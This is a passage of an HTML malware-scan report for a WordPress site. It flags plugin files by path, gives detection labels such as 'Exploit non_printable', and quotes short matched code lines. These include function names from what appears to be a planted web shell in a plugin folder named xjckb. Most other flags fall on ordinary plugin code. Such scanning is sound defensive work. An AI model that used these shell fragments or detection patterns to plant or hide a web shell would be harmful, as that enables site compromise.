</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_257").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xjckb/uninstall.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.27 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_258" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$plugin_name </span><span style="color: #007700">= </span><span style="color: #DD0000">'protect-uploads'</span><span style="color: #007700">; if( </span><span style="color: #0000BB">is_admin</span><span style="color: #007700">()) </span><span style="color: #0000BB">delete_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_name </span><span style="color: #007700">. </span><span style="color: #DD0000">'-protection' </span><span style="color: #007700">); } } </span><span style="color: #0000BB">Alti_ProtectUploads_Uninstall</span><span style="color: #007700">::</span><span style="color: #0000BB">run</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_258").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xjckb/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.19 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_259" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">; } </span><span style="color: #0000BB">?></span> </div> </body> </html></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 376</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">author</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekdir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 400</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='writable'>writable</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 402</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='readonly'>readonly</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekroot</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xrmdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">green</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">red</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 742</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statusnya</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_259").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/vc_templates/ult_tab_element.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.43 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_260" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$op</span><span style="color: #007700">; </span><span style="color: #0000BB">$actab</span><span style="color: #007700">=</span><span style="color: #DD0000">''</span><span style="color: #007700">; </span><span style="color: #0000BB">$actab </span><span style="color: #007700">.=</span><span style="color: #DD0000">'<div class="ult_acord"> <div class="ult-tabto-accordion " style="width:;" data-titlecolor="'</span><span style="color: #007700">.</span><span style="color: #0000BB">$tab_title_color</span><span style="color: #007700">.</span><span style="color: #DD0000">'" data-titlebg="'</span><span style="color: #007700">.</span><span style="color: #0000BB">$tab_background_color</span><span style="color: #007700">.</span><span style="color: #DD0000">'" data-titlehoverbg="'</span><span style="color: #007700">.</span><span style="color: #0000BB">$tab_hover_background_color</span><span style="color: #007700">.</span><span style="color: #DD0000">'" data-titlehovercolor="'</span><span style="color: #007700">.</span><span style="color: #0000BB">$t</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$op</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 481</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$actab</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 88</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_family'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_style'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_260").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/vc_templates/single_tab.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.26 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_261" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_261").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/shortcode_cat_grid.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.93 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_262" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div class="woocommerce columns-' </span><span style="color: #007700">. </span><span style="color: #0000BB">$columns </span><span style="color: #007700">. </span><span style="color: #DD0000">'">' </span><span style="color: #007700">. </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">() . </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">WooComposer_Cat_Grid</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_init_grid</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check </span><span style="color: #007700">*/</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_grid_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 451</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div class="woocommerce columns-' </span><span style="color: #007700">. </span><span style="color: #0000BB">$columns </span><span style="color: #007700">. </span><span style="color: #DD0000">'">' </span><span style="color: #007700">. </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">() . </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_262").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/design-single-style03.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.89 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_263" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 215</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Single_style03</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_263").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/design-loop-style01.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.48 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_264" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 118</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">strip_tags</span><span style="color: #007700">( </span><span style="color: #0000BB">$shortcode </span><span style="color: #007700">) ) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Loop_style01</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$element</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_264").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/design-loop-style04.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 13.68 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_265" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 118</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">strip_tags</span><span style="color: #007700">( </span><span style="color: #0000BB">$shortcode </span><span style="color: #007700">) ) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Loop_style04</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$element</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 364</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_265").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/woocomposer/modules/shortcode_product.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 13.27 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_266" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">'WooComposer_Single_'</span><span style="color: #007700">.</span><span style="color: #0000BB">$product_style</span><span style="color: #007700">; </span><span style="color: #0000BB">$output </span><span style="color: #007700">.= </span><span style="color: #0000BB">$function</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">); return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">WooComposer_ViewProduct</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Init_Product</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 386</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Product</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 396</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
